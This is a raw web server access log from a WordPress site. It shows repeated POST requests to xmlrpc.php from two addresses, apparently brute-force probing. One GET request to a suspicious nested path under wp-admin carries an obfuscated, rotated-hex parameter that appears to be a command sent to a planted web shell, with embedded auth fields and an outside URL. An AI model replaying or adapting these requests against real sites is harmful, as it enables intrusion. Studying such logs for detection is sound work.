196.251.85.75 - - [20/Oct/2025:10:22:28 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:22:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:29 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:30 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:30 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:20:04 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333630342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303937303030342q3864313334376532356230303431383231316431343265653239663036343739222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:22:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:31 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:31 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:32 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
